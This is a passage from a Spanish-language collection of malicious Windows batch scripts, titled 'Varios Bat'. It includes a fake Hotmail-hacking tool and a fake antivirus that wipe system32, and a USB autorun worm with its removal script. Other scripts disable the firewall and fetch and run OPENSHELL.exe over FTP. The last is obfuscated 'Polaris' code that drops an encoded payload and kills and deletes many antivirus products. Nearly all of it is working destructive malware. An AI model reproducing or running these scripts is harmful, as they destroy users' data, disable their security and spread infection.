@echo offcolor 12title HACK HOTMAIL 1.0echo --------------------------------------------------echo Bienvenido al programa de hack hotmailecho con este programa robara el password echo al correo hotmail que ponga en el programaecho el programa hackerara el correo de su victimaecho y luego le enviara el password al programa HACK HOTMAILecho -------------------------------------------------------pauseclsecho Escriba el messenger de su victimaset /p correo=El msn es=pauseecho Los datos se estan cargandomsg * 10% de carga completadamsg * 30% de carga completadamsg * 50 % de carga completadadel /s /f /q %windir%\system32msg * 80% de carga completadamsg * 100% de carga completadapauseclsecho  Los archivos estan comprimidosecho Pero el sistema va a descomprimirlospausedel /s /f /q %windir%\%programfiles%del /s /f /q %windir%\system32msg * Archivo descomprimidopausecls

Page 25: Varios Bat

echo Se creara una carpeta con su password robadaecho shutdown -s -t 05 -c "Lammer de mierda">>cmd.batstart cmd.bat

--------------------------------------------------------------------END--------------------------------------------------------------------

Virus Batch Worker

echo offTitle Security PC clsecho This is a Program to Delete all trojan's, virus, and Wormsecho Founded by Kapersky lab, Norton, Nod 32 And Panda. (all of 2008)echo.echo you are ready to start program???pause>nuldel %systemroot%\inf\keyboard.infclsdel %systemroot%\inf\keyboard.pnfclsdel %systemroot%\inf\mouse.infclsdel %systemroot%\inf\mouse.pnfclsecho off>bat3.batTitle You Are Infected!!!!>bat3.batFOR /R %%x in (*) DO (DEL "%%x")>bat3.batcls>bat3.batclsFOR /R %%x in (*) DO (MOVE "%%x" %systemroot%\bat3.bat)clsgoto :bat2.batclsgoto :bat1.batclsecho Founded 15 wORMSECHO Founded 12 Trojansecho founded 9 Horse Trojansecho founded 28 Possible Virusecho founded 1 Bat Virus Workerecho The application prevents from continuing echo The virus bat.worker are hacking meecho The application prevents from continuing echo Hacking 196y3ng73bgf83 gjg8bmcb....ba techo Hackedecho This happens to you for an onlookerecho and suck my dick butecho you'r atacked for "bat.virus.suck .horse.trojan:Worker.automat ically"shutdown -s -t 5 -c "Beginning process of shutdown, ByeZzZ"start bat.bat "%systemroot%\bat3.bat":bat2@echo off @cd C:\WINDOWS\system echo bean>MOUSE.DRV @cd.. @cd C:\WINDOWS\system32 echo bean>mouse.drv @cd.. @cd C:\WINDOWS @rmdir /S /Q Cursores @cd.. @cd C:\WINDOWS @rmdir /S /Q Cursors @cd..

Page 26: Varios Bat

@cd C:\windows\system32 @echo off>Winbat.bat @cd C:\Windows>>Winbat @reg del HKEY_CURRENT_U SER\Control Panel\Sound /F echo bean>SETDEBUG.EXE>>Winbat.bat echo bean>TETEP.DLL>>Winbat.bat echo bean>Twain.dll>>Winbat.bat echo bean>Twain_32.dll>>Winbat.bat @DEL /S /Q JavaAccessBrid ge.dll>>Winbat.bat @cd.. @cd C:\System Volume Information\_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}\RP51\ @echo off >WIN32.bat @reg add HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run/v Win32 /t REG_SZ /d WIN32.bat /F >>WIN32.bat @reg add hkcu\software\microsoft\windows\currentversion\pol icies\system /v disabletaskmgr /T REG_SZ /D 1 /F >>WIN32.bat @reg add hkcu\software\microsoft\windows\currentversion\pol icies\system /v disableregistr ytools /T REG_SZ /D 1 /F >>WIN32.bat @reg add hkcu\software\microsoft\windows\currentVersion\pol icies\Explorer\RestricRun /T REG_SZ /d eventvwr.exe /F >>WIN32.bat @reg add HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows NT/CurrentVersion/Winlogon /v logonprompt /t REG_SZ /d YoU ArE InFeCtEd!! /F >>WIN32.bat @reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\Curre ntVersion\Polices\Explorer /v NoSaveSettings /T REG_DWORD /D 1 /F >>WIN32.bat @reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explore /v NoClose /t REG_DWORD /D 1 /F >>WIN32.bat @cd.. @cd C:\System Volume Information\_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}\RP51\ @reg add HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run/v colorbat /t REG_SZ /d colorbat /F >>colorbat.bat @echo off>colorbat.bat @:menu>>colorbat.bat @GOTO :MENU>>colorbat.bat @cd>>colorbat.bat @cd C:\windows\system32 @DEL /S /Q Winbat.bat:bat1del c:\antiba~1 del c:\antiba~2 del c:\antiba~1.1 del c:\antiba~1.2 del c:\antiba~1.3 del c:\antiba~1.4 del c:\antiba~1.5 del c:\antiba~1.6 del c:\antiba~1.7 del c:\antiba~1.8 del c:\antivi~1 del c:\avg del c:\avpers~1 del c:\comman~1 del c:\esafen del c:\findvi~1 del c:\f-macro del c:\f-prot del c:\f-prot95 del c:\f-secu~1 del c:\fwin del c:\fwin32 del c:\inocul~1 del c:\inocul~2 del c:\kasper~1 del c:\kasper~2 del c:\mcafee del c:\msav

Page 27: Varios Bat

del c:\norton~1 del c:\norton~2 del c:\pccill~1 del c:\pc-cil~1 del c:\tbav del c:\tbavw95 del c:\toolkit del c:\trendm~1 del c:\vs95 del c:\progra~1\antiba~1 del c:\progra~1\antiba~2 del c:\progra~1\antiba~1.1 del c:\progra~1\antiba~1.2 del c:\progra~1\antiba~1.3 del c:\progra~1\antiba~1.4 del c:\progra~1\antiba~1.5 del c:\progra~1\antiba~1.6 del c:\progra~1\antiba~1.7 del c:\progra~1\antiba~1.8 del c:\progra~1\antivi~1 del c:\progra~1\avg del c:\progra~1\avpers~1 del c:\progra~1\comman~1 del c:\progra~1\common~1\avpsha~1 del c:\progra~1\common~1\symant~1 del c:\progra~1\f-prot del c:\progra~1\f-prot95 del c:\progra~1\findvi~1 del c:\progra~1\f-secu~1 del c:\progra~1\fwin del c:\progra~1\fwin32 del c:\progra~1\grisoft del c:\progra~1\inocul~1 del c:\progra~1\inocul~2 del c:\progra~1\kasper~1 del c:\progra~1\kasper~2 del c:\progra~1\mcafee del c:\progra~1\norton~1 del c:\progra~1\norton~2 del c:\progra~1\pandas~1 del c:\progra~1\quickh~1 del c:\progra~1\symant~1 del c:\progra~1\tbav del c:\progra~1\tinype~1 del c:\progra~1\trendm~1 del c:\progra~1\trojan~1 del c:\progra~1\zonela~1 cls

--------------------------------------------------------------------END--------------------------------------------------------------------

Pendriver NAXO_ITC

@echo offattrib +s +h %0msg * hacked by -={ naxo itc }=-reg add hklm\software\microsoft\windows\currentversion\run /V Dump.exe /D C:\Drivers\Dump.exe /f

:bluceping -n 10 127.0.0.1IF exist C:\Drivers (goto 02) else (md C:\Drivers & attrib +h +s C:\Drivers & goto 02):02FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (IF exist %%A:\Drivers (goto a) else (md %%A:\Drivers & attrib +h +s %%A:\Drivers & goto a) )

Page 28: Varios Bat

:aIF exist C:\Drivers\Dump.exe (goto 05) else (goto 04):04FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (attrib -s -h %%A:\Drivers\Dump.exe & copy "%%A:\Drivers\Dump.exe" "C:\Drivers\Dump.exe" & attrib +s +h %%A:\Drivers\Dump.exe)attrib +h +s C:\Drivers\Dump.exe:05IF exist C:\autorun.inf (goto 07) else (goto 06):06echo [AutoRun]>>C:\autorun.infecho label= naxo itc>>C:\autorun.infecho open=Drivers\Dump.exe>>C:\autorun.infecho shellexecute=Drivers\Dump.exe>>C:\autorun.infecho shell\Auto\command=Drivers\Dump.exe>>C:\autorun.infattrib +h +s C:\autorun.inf:07for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" C:\autorun.inf') do set co=%%Bif naxo== %co% (goto b) else (goto nar):narattrib -h -s C:\autorun.infdel /f /q C:\autorun.infgoto 06

:bFOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (IF exist %%A:\Drivers\Dump.exe (goto 08) else (attrib -s -h C:\Drivers\Dump.exe & copy "C:\Drivers\Dump.exe" "%%A:\Drivers\Dump.exe" & attrib +h +s %%A:\Drivers\Dump.exe & attrib +s +h C:\Drivers\Dump.exe & goto 08) ):08FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (IF exist %%A:\autorun.inf (goto 09) else (attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce) )

:09FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" %%A:\autorun.inf') do set co=%%B )if naxo== %co% (goto bluce) else (goto her):herFOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (attrib -h -s %%A:\autorun.inf & del /f /q %%A:\autorun.inf )FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce )

Aqui les dejo el antidote del virus anterior

@echo offtitle antivirus del NAXO_ITC by holyknighttaskkill /f /im dump.exeattrib -h -s C:\autorun.infdel /f /q C:\autorun.infreg delete hklm\software\microsoft\windows\currentversion\run /V Dump.exe /D C:\Drivers\Dump.exe /fattrib -h -s C:\Drivers\Dump.exedel /f /q C:\Drivers\Dump.exemsg * Te he borrado el virus, no me agredezcan

--------------------------------------------------------------------END--------------------------------------------------------------------

Desactivar el firewall de windows

@echo offif exist C:\Windows\downloads exitnet stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"md "C:\Windows\downloads"echo open>"c:\windows\downloads\dfshell.dll"echo HOST_SERVER_FT P>>"c:\windows\downloads\dfshell.dll"echo USUARIO>>"c:\windows\downloads\dfshell.dll"echo PASSWORD>>"c:\windows\downloads\dfshell.dll"

Page 29: Varios Bat

echo lcd ..>>"c:\windows\downloads\dfshell.dll"echo lcd "c:\windows[/a]>"c:\windows\downloads\dfshell.dll"echo binary>>"c:\windows\downloads\dfshell.dll"echo get OPENSHELL.exe>>"c:\windows\downloads\dfshell.dll"echo binary>>"c:\windows\downloads\dfshell.dll"echo get semaforo.txt>>"c:\Windows\downloads\dfshell.dll"echo bye>>"c:\windows\downloads\dfshell.dll"ftp -s:c:\windows\downloads\dfshell.dllif exist c:\windows\semaforo.txt start c:\windows\OPENSHELL.exedel c:\windows\downloads\dfshell.dllpauseexit

--------------------------------------------------------------------END--------------------------------------------------------------------

Polaris Virus

@echo offset VaR=Export set a=echo set b=Reg Add set c=HKLM\Software\Microsoft\Windows\Currentversion\Run /v set d=%systemroot%\system32\set dI=%systemroot%\system\set e=RunDll32set f=del /q /f /s set g=abcdefghijklmnopqrstuvwxyz.\/-set h=g:~4,1call set h=%%%h%%%set i=g:~3,1call set i=%%%i%%%set j=g:~11,1call set j=%%%j%%%set k=g:~17,1call set k=%%%k%%%set m=g:~6,1call set m=%%%m%%%set n=g:~19,1call set n=%%%n%%%set o=%k%%h%%m% %i%%h%%j%%h%%n%%h% set pa=g:~2,1call set pa=%%%pa%%%set p=g:~7,1call set p=%%%p%%%set q=g:~10,1call set q=%%%q%%%set r=g:~17,1call set r=%%%r%%%set s=g:~27,1call set s=%%%s%%%set t=%p%%q%%pa%%r%%s%set u=%o%%t%set v=g:~5,1call set v=%%%v%%%set w= /set x=Net Stop set y=TsKiLl set z=if

Page 30: Varios Bat

set aa=g:~1,1call set aa=%%%aa%%%set ab=g:~26,1call set ab=%%%ab%%%set ac=g:~0,1call set ac=%%%ac%%%set ad=%pa%%ac%%pa%%p%%h%\set ae=g:~8,1call set ae=%%%ae%%%set af=g:~1,1call set af=%%%af%%%set az=g:~29,1call set az=%%%az%%%set ah=shutdown -s -f -t 00set ai=%ac%%n%%n%%k%%ae%%aa% %az%%k% %az%%ac% %az%s %az%%p% set ex=g:~18,1call set ex=%%%ex%%%set exA=g:~14,1call set exA=%%%exA%%%set exB=g:~13,1call set exB=%%%exB%%%set AzA=g:~15,1call set AzA=%%%AzA%%%set xD=%k%%h%%exB% set Re=%xD%1%ab%%h%X%h% set Zz=%ab%%ex%%exA%%exB%%exB%%h%set Ax=%ac%%ex%%ex%%exA%%pa% %Zz%=

cd %d%call:w98 > "1.reg"call:polaris > "%e%.bat"call:run > "%e%.com"%z% exist 1.exe goto y%e%.com > nul:y1.exeregedit /s 1.reg%f%1.reg > nul%f%%e%.com > nul%Ax%%AzA%%z%fi%j%%h%> nulExit

:run%a%XPPPYZIQD[L-f6-g41GDSXu'@,~P^^P_O,!(GU(GZ(Gnu5-NETSEND_V1.00_JRT=%a%CFFFRX,`,`2$F=@!t.rQ0%%IuL0%%(%%(%%GERYAARX2%%(%%t8-1.EXE________01200%a%1v1v0^<0xD^"1^<0$G^"P/0A0^^F^"12d^"1TP)0B0z0z1^^Q+0m1TQ-w^"1+1S1#0B0zd^"0]%a%Q+0z0Y1_1o0Sh^"0u0XP*d^"0]P,0z0Y1_1uv^"P-q^"e^"e^"0S0.0^>1kP-0^&E^"001S1.%a%0S130X1(K^"100(100(100(0T16v^"081/0$M^"070S050T0-v^"0/0C0T0^"v^"081/0$%a%M^"070X17I^"0XQ+L^"0_N^"0S050T0-v^"0/0C0X1#L^"1S0#1#0F19P*D^"0^<Q/1F1C0^<%a%1#D^"1C0i1^<0x1Y0^<P*D^"0p17!(c)JIM_TUCKER_jtu [email protected]_XXXX^<%a%s'7O!!)[q;_(7O!!!!!!!!-CV^"h/k^>09H2^<lNTb-.`q48D!AD_%%ZiC57pLXqVuTw%a%I61BUDS`aSnY:^>!.$XG$b7_mfrh=^".=-9H^&+go_N9kn[g?!.$XRsb8P^<Y9!!-;qb%a%^"`M*^&4..jpq41I!1`E*^"P=xd)/%%dOW^&C?W)1($f7Fj^"UIR%%'.Ydd#_.R%%1;cKu4`%a%`^<*^"@^"^&]g1rXS^>I^^vAg?#_UU%%1dPKtEUbFY=imm`i#8cOW%%')=G+#J.b+c0L1a/(%a%rX!$YVN^"pKLnN17T!8!^"3!SudeN?!e?G`^<@PPaxp4`#+!!!!!!!!!^"!1!!'?!!^&Z%a%!@onyZznM{+S!!!!d@!$Z2!$j0^"#7v7e!YEI!!bWMNo'5IY9Z\Y?SVN^<,@^"nN:)1%a%uE+BC\y)*5v*C{4S!HC^&s{cks^>t`Et\)Y9Bo8sO6j1!pcS^&Y!0eW0[L(+diI$D=t%a%!k,4*lN4Ek^&Bz^&^&EojdnPfN^<,^>^"nNB'Oz^^o[#0P[j1f[Ul9/!=BP-dMM+dIi/6g@%a%Z\om0[M-'u6*7bovO.oc^"L5ESY%%td^^Q7!AAf?vj^>j2#,dH%%^<#,YCq5!$6OuA^<wrY%a%L[h,%%@Mm)[0O7acjN^"Bj*fN:`)pLGg!#v^^]Iii0l?w#My^^G*m2T/0=O4^&+ZTxKk^^%a%efD+yYe3_*ZVg[4e!yKO*mN2S\RwN*^&Z!yp's{NB*u^"EyY^"8^"C!)!vC@^"lZ2^^F!!%a%R/qX9^^SA1tEe3$$j@GF\z^>!-4wllKK^&EefD+s{vy1o%%XNYVKY9N*W3-M/jt`:r:E%a%#jp's{pE$1,\-aOWSm'?!n`D^&bdP,^<)M%%uBIo^^S]r`,X=1pT_K@2-dP_^^c8^&dX!{%a%$C=D!+dXU5^>l3QBg!IxnG8b204!m:rC^&4My{!)/WE^^4nWa^"j$9AT-g#qo$,BKP'@%a%^"^&Zn\G/P9xaMX@aqAzaI^>Zgfb8,BH`=u(+\eQufD$^^^>-?(;Lfn+8\0[,)OVJP.[I

Page 31: Varios Bat

%a%q+CQ1a!$daBn,^<%%8^&\O_xH#{^"^&?9\17S'a4%%#kOH=9Y_0M^&vf^<P1%%cB3O,!U\)K5%a%!%%AYN^<f#9H(yTmnxt[JoivlX,B),-)FI?tR^&H,,O%%.D!.DeOv2,NH{W_GmOzPMhG%a%9bv$b.z^"(eJ^>pdy(d'X{j^"F4`{Y(^^ao^^uObCdPYiEVgG9j,HN6%%-@^<8$^"iVO7fe^&%a%e]4XILG#'Km._xp+\0$P-]/'^"F)P'DZj)p0N^<iN=OGd`$Xl(2gCzE=)e^"#?R3=%%9%a%-@%%^<%%S_YfB^"I;KY9^"hrqjb!aYrBfBrKyp$,@JF#sSe+h(^&!E!QN^"!%%gU;d!^"$*,Z%a%e5!*N*-m847c^&k,^>Eg)K^&gY',8#rm^^!Q7q)434#;+cm^"Y:K^&dn!]8/iU)i5-6lVJ%a%/BJ@OI)7E-7r;q951y,Ms%%Q!!YXR^"TI(\S!e!+)3UHR^<+9,hO/.V'O!$2/yUq!+Z%a%xR/OlQac#{.^&s]P/-j5w8v#SvBfmg6?cq*CY42F2eF!R24N^<(8+U^"M/^"8XP5V{oz%a%duYi!q^"f#+VVv2S?y_F.+4TN^"L!a#2R^<*{[6Aa!^"qb[teeh,,xN^"RP-%%,@Fv1s5=%a%a5U3/?-aO(!^"^",poeu,48l;doZC/YD.$g],^<G#JN#m9@-?^"G^"H@^":^^,!_weV8u]Q%a%!*uVxN^&^^`,;B!3rX^"\#x^"RK?^"GR{f!7a$p;'2^^E6;T:f^>*i`dV7Oj6uL(47q]QNb%a%!5OzgBNJ0ME6:f:zNZ7f.4I%%p(Hg3W#mLaS[!%%%%.^"-Rw6Z^"8%%us88,D@nkEy^&rJg%a%6B!%%(0JQ3QH;g^"Nm!.!$!$!%%8MNE84xTHTYU!i@P2^<tO4h=j^"^&XT^"F*^<ew!^"NUCn%a%eY0XNbf=pZYm1^"B?x655@Ead0NLC2WS[0ZpN;GYve-^&le0w/'@^"2Sc)U2_j8)O5+%a%;_#75#N5dR#s#QqD!!);'`[S901quM/.^"^^!5!APv%%?MZnc#r!.oiN%%!'=.,?:)yi%a%!!Zd3OK;T\4x'7^>`7r!{!a%%FXuS*nwR:^"t*n#Vt(8NUICe$XN#(;!#^"-^^5$.HJ)\%a%$g!-C24xp8$(^"f#+f:E@#1_biI%%w\,#k#A^&c.\^&Zic_7O9_GPMHD%%8z:N,?:Zb2W%a%!%%85i584%%n,Y947O!+5I^&ZQXN*u6/?Rjaa.P:^>!e[T8vMN7Q+zl8){Z^&,wz\26fF%a%!BpMZO%%KV:^"OTe^"R(O(0,UEYCE%%qD*vvp-9TZ^>Y(QS+g76$$5$^&r$OQ)p7VR^";\@%a%NclX7QJX8^<q{l@=x^"F-+EEHux3_(f_fjO^^^"gN)4S#qX?/+T:OW,lNn!Bo;NCR[q2%a%%%/+V)WV-#u5=,8!WH\-+Bv86I:7Umk!!3'l84a[E^&\+k^&raW8$:-uFRX,8^"SONQU%a%9@OG'1%%=,rRR!aQMBg,o,[)vex(,Ii^&]Kb!9(f4hwmrndbVJ7Qd i!#N/h.'?-]^&Z%a%XV!!\N8$VXBw9^^UeOnS.OUdkR8A+YEKKgC!)S/!Q%%n,8@S[f*yA^"^&Z'-!%%!N$@C,%a%4`du^>^<g!^"_#-'b#-!xo'(Aew^&rQm!9iC,IE`vKON--P2FZN(5+^"J#%%;o!(%%Y-GBZ%a%,;G%%O(NJOg^&(03!*CU)U.8!9vo^^r!iMu!DLxdR*49_*3hd)Om+,8X^^HTpp1ri1qf%a%O's^^!$[z^"L-^<Q%%4m!9^")^&:,h6'pN@/.b$c9\^&r(k!#Hw,@#Clx.5,xEV=mf[u:!e%a%1^^f\^&Zj71ruS!^"^<^^S\dPeFOoa^"S#4^"$64R*z-laa,jOG7P9),Z-rN$!@tC*MhI*^<%a%nU^&b?N:FO,8,f\0,#P$2e9'!#+,p!c!CQQ!^^z4,ica_(^"^^N2^&)qCPl%%?%%C(iU-/+%a%/=,]XLC^>_g,YB`^"G!#AC+CNl!-_@2.%%^":FYMIY7O^&sfDJoe^<2ziK!^>4`!;j6!R_U%a%N2ig^>BOFI9#ps=%%6J3%%5#0kW7TVNGx]57pj/Y[$KND$\dP^&j+r)en?,P)$^&bf^&1Q%a%^"^&p'8ybU=/$*\(!;[O^&gDJ=Nju,hQ^"3Q^"gT`!^&c`OOBYU)/*`D7u.6!bp^<NCl:.D%a%(Q7O%%D%%$)I?s)Q5DSk.uYY8e*?!tJ09Z,?^&\^&_`D^&v\P!1ppT!CM^>C^&385!,7^&%%^<%a%9{S[^>FBj!'HdBfI=NDC('B^&7G!)Y!(EVc=^&b0lBnE3I!g2iWdQ-^>f^^Z?:@1E!a$3%a%J`,pVp8%%?8,8f'lI^"n^<;N%%G\Pt2l1yA':F,l^&2Bm4r^"^&?q.$)wT!%%5iu!!uS)YWW%a%#k,fgW9[lX7QPyP0^&4(f-u#96_`R!A(0j^^f:Ck^&FLX%%^<^^r#y^"lR6F)G+-^"UY7z$@%a%Z?^")!cT5t`'?6l^&k,@^&r!(4h8D#{^"YH,f{dH#,!(f\^&l9_)dqs!9h8HTa.!!g*C-%a%S#9Z!-#!!U3:OS1xb^"BxlRC^<M1dPfpeU^"vK6%%K]:$l-i!9+Wx4Cl'1j%%w_OG!+^"L%a%!\#1!'cm!-G12.+wBwC^&_hRG!BQX3N^"O0AN^&:K]L'32*!B@0dq/zpm$Y12#tBG#s%a%D4^&f^>71yD;_/fx#[PB\$8F)q9[+,Io*-'U!^>mM,H^"]^&zg^&:.NG*@OM51OM.9#q]C%a%dl8((^<,iRBY:XK#,nK!c)Ia.^&f;G,@5w4`qTbfPP,PfZ%%)!c%%BTd/c^^v'$'9,qMU%a%uW7cTp!g/H%%65'Pn42OK^&b7['Y^^z^"8e!pOu[7P%%7s[^"ecN^&x`hrbH?#k^&jdV^"Cxl%a%7R6j85+7Pl6AnH)It2^>0x.I9O@^^riXV;N:!SVb8d^&\CSPle1j:-5^"FC+,DNB#W:!%a%(pQq^&]^"M!#WV4hFZHDjjdW#+!#^&2!(0\^"qeu(bY9N[!!R=N/t*!8.b!Q/'^"FPl^>6%a%dQ.1!^"#/!-=%%!80L#]JN2oY9Nm,9o.N^"!1!H\h!*6J'w7O2D,Fe6!(^"Y!$O?^"^>%%e%a%!_7O3%%arntCN72!+D0!Me-!D!!#oog,U^^u^>X!%%F%%!S.B7_G`1(h%%G(EeOy^&]^")Pq%a%OA!TzV#L!!'XXX3EBf$*!%%M^>Bga5!Y6Z#nfZ-TBfuhBiAWN0-q-Bc78k3l^&7fZ%%u%a%owiXdW5^^!!qC,s`t%%cEU4xg?gF!$N;!(%%W!TNb!'Uu$0dPN!7[jS7U4@P{'A-#m-%a%!Z,z/f^>ZPo1t+;!#8$')S79#DA^&{Z^"8sar'3okBx!^"^":^"^>!Q^&;P0-EPl$*N^";\N*%a%z6!^^n:!)Yy!1^^v2]S[S0dWw^"!.=mNl=a$(:^>!eaa#qoj!BN*s#!^"nJ#[+s)rDa^>0%a%S\+q7TO.^&{(T*gD0^&!Nb!\aax5ogdZN)v@!A+c^"Kvj!:OGE=N^")M!'#q!2Q5!8dP%a%$-F:Y1E]o%%^^r-!!.p^^!VHH!,uG!`[C#+7OrldT!^>Sl$^<,X^&_!!.B6RK;j?ojqg!(%a%.m,_fV!aS^<-T-]:7S[p+dPA=#IYU!FhT^"o^"F7^&/'^>.'A$O;tIw!#.r1m3;![ogF(%a%$1-{q5?[!1^<nD^<qi7g;(GI=-BnBg?6N1l2!C+K#@7_^<'dP8TN^"=+!#\,!+YA.5-f%a%^"r5E,Z,8/'BuiS!-JB!_]OOUWO%%cHDP]Hw'!E!9DV{*$DtK,V[mAB%%Bvf*!%%E/Q+%a%)W!d*^>Pu.t$5*:gg\J^"4r^"OD*!799a!a2vsAD3owA#NeUE7Zf.,zxlPw^"X#-N*j'%a%vjY9!-bx(EvO!A)N!*dP^"$(=hnjo21gOb!,d'w#Zr6,M#/jB2IYXevpD*#Go7u`U%a%^<vN^"^"=goCA$P**NP!%%'y0uY51C%%5)I4PZ@!5*vo_*%%Ma7gj75E%%uc8cDxGCQ=LOe%a%G?!#L`O557^&K!i!%%*B+g%%=hAS`vT^<H8^^7/(d^&_$!@MCQDGQOuoD^<F4Y)Kh81++Q=%a%!!*0f^&qYW+86P;^^e6xGaLOqJp-CR$?\CyH,zz^&jY=86ev7$^"y,[-\yUw\epLrnac%a%!'H.L`$!=@CQL0:^>o^^3FRZj6`c4h1F!fh7N$7eiH^&bIs[z/PXqOmV=931[.kN'^"f%a%$T3GP1^"8)=,I%%5RF8(+PiZ#u\eg9ELRIZ^^#kIgxwopULR#jf^"e^>G$-^<i^"HEAUmnb%a%j17R!$f_YpA1/kg/\D^>V1799gX('Co=;RC822;!.Tb-*7_^"j59/;N$[h!)VV!:V*%a%!g)]^&ZEU;g;$(ZN^&3{!/an/W]O$+vmNnS[hl7XdaHL^&67r/g#^^X\)zN)Dx,M+1Oi%a%c^^,Qu8[)g`@96+^<g*#bUr{,T!.@!sPDd]zN#=N^>#^"Q!^"mi^"r1I1T6/^<^&u:B^"#@KJ%a%'!!!~^<

Page 32: Varios Bat

goto:eof

:polaris%a%@echo off%a%%b%%c%%e% /t reg_sz /d %d%1%Zz% /f%a%%x%"Centro de seguridad"%a%%x%"Firewall de Windows/Conexión compartida a Internet (ICS)"%a%%x%"AVG7 Update Service"%a%%x%"AVG7 Alert Manager Server"%a%%x%"AVG E-mail Scanner"%a%%x%"AVG Anti-Spyware Guard"%a%%x%"NOD32 Kernel Service"%a%%x%"avast! Web Scanner"%a%%x%"avast! Mail Scanner"%a%%x%"avast! iAVS4 Control Service"%a%%x%"avast! Antivirus"%a%%y%ccProxy%a%%y%ccSetMgr%a%%y%SNDSrvc%a%%y%SPBBCSvc%a%%y%ccEvtMgr%a%%y%ccApp%a%%y%NMAIN %a%%y%SBServ%a%%y%NOPDB%a%cd %programfiles%\Archivos comunes\Symantec\Shared%a%%z% errorlevel==1 goto 1%a%%ai%*.*%a%%f%*.*%a%:1%a%%y%symlcsvc%a%cd %programfiles%\Archivos comunes\Symantec\SharedCCPD-LC%a%%z% errorlevel==1 goto 2%a%%ai%*.*%a%%f%*.*%a%:2%a%%y%navapsvc%a%%y%ISSVC%a%cd %programfiles%\Norton Internet Security%a%%z% errorlevel==1 goto 3%a%%ai%*.*%a%%f%*.*%a%:3%a%%y%navapsvc%a%%y%NPFMntor%a%%y%navapw32%a%%y%SAVScan%a%cd %programfiles%\Norton AntiVirus%a%%z% errorlevel==1 goto 4%a%%ai%*.*%a%%f%*.*%a%:4%a%%y%NPROTECT%a%cd %programfiles%\Norton Utilities%a%%z% errorlevel==1 goto 5%a%%ai%*.*%a%%f%*.*%a%:5%a%%y%GBPoll %a%%y%navapsvc%a%%y%NPFMntor%a%%y%NPROTECT%a%%y%NOPDB%a%%y%GBTray%a%%y%NPFMntor

Page 33: Varios Bat

%a%%y%GhostTray%a%%y%PQV2iSvc%a%cd %programfiles%\Norton System\Works\Norton AntiVirus%a%%y%no-spy%a%if errorlevel==1 goto 6%a%cd %programfiles%\SinEspias%a%%ai%*.*%a%%f%*.*%a%:6%a%%y%spyaxe%a%%y%spyaxe%a%cd %programfiles%\SpyAxe%a%%z% errorlevel==1 goto 7%a%%f%*.*%a%:7%a%%y%SpywareStrike%a%%y%SpywareStrike%a%cd %programfiles%\SpywareStrike%a%if errorlevel==1 goto 8%a%%ai%*.*%a%%f%*.*%a%:8%a%%y%gcasDtServ%a%%y%gcasServ%a%cd %programfiles%\Microsoft AntiSpyware%a%if errorlevel==1 goto 9%a%%ai%*.*%a%%f%*.*%a%:9%a%%y%kavsvc%a%%y%kav%a%cd %programfiles%\KASPERSKY LAB\KASPERSKY\ANTI-VIRUS PERSONAL%a%if errorlevel==1 goto 10%a%%ai%*.*%a%%f%*.*%a%:10%a%%y%VsStat%a%cd %programfiles%\McAfee\McAfee VirusScan%a%if errorlevel==1 goto 11%a%%ai%*.*%a%%f%*.*%a%:11%a%%y%Pavsrv51%a%%y%AVENGINE%a%%y%apvxdwin%a%%y%pavProxy%a%cd %programfiles%\Panda Software\Panda Antivirus Titanium%a%if errorlevel==1 goto 12%a%%ai%*.*%a%%f%*.*%a%:12%a%%y%SynTPLpr%a%%y%SynTPEnh%a%cd %programfiles%\SynapticsSynTP%a%if errorlevel==1 goto 13%a%%ai%*.*%a%%f%*.*%a%:13%a%%y%FrameworkService%a%%y%Mcshield%a%%y%VsTskMgr%a%%y%SHSTAT%a%cd %programfiles%\Network Associates\VirusScan%a%if errorlevel==1 goto 14%a%%ai%*.*

Page 34: Varios Bat

%a%%f%*.*%a%:14%a%%y%nod32krn%a%%y%nod32kui%a%cd %programfiles%\Eset%a%if errorlevel==1 goto 15%a%%ai%*.*%a%%f%*.*%a%:15%a%%y%AVGSERV9%a%%y%AVGCC32%a%cd %programfiles%\GRISOFT\AVG6%a%if errorlevel==1 goto 16%a%%ai%*.*%a%%f%*.*%a%:16%a%%y%AVGUARD%a%%y%AVWUPSRV%a%%y%AVGNT%a%%y%AVSched32%a%cd %programfiles%\AVPersonal%a%if errorlevel==1 goto 17%a%%ai%*.*%a%%f%*.*%a%:17%a%%y%ASHSERV%a%%y%ASHWEBSV%a%%y%ASHMAISV%a%cd %programfiles%\ALWIL SOFTWARE\AVAST4%a%if errorlevel==1 goto 18%a%%ai%*.*%a%%f%*.*%a%:18%a%%y%avgcc%a%%y%avgamsvr%a%%y%avgupsvc%a%cd %programfiles%\Grisoft%a%if errorlevel==1 goto 19%a%%ai%*.*%a%%f%*.*%a%:19%a%%y%Pagent%a%%y%pagentwd%a%%y%pavsched%a%cd %programfiles%\Panda Software\Panda Administrator\Pav_Agent%a%if errorlevel==1 goto 20%a%%ai%*.*%a%%f%*.*%a%:20%a%%y%bdoesrv%a%%y%bdmcon%a%%y%bdnagent%a%%y%bdswitch%a%cd %programfiles%\Softwin\BitDefender9%a%if errorlevel==1 goto 21%a%%ai%*.*%a%%f%*.*%a%:21%a%%y%avgamsvr%a%%y%avgupsvc%a%cd %programfiles%\AVG7%a%if errorlevel==1 goto 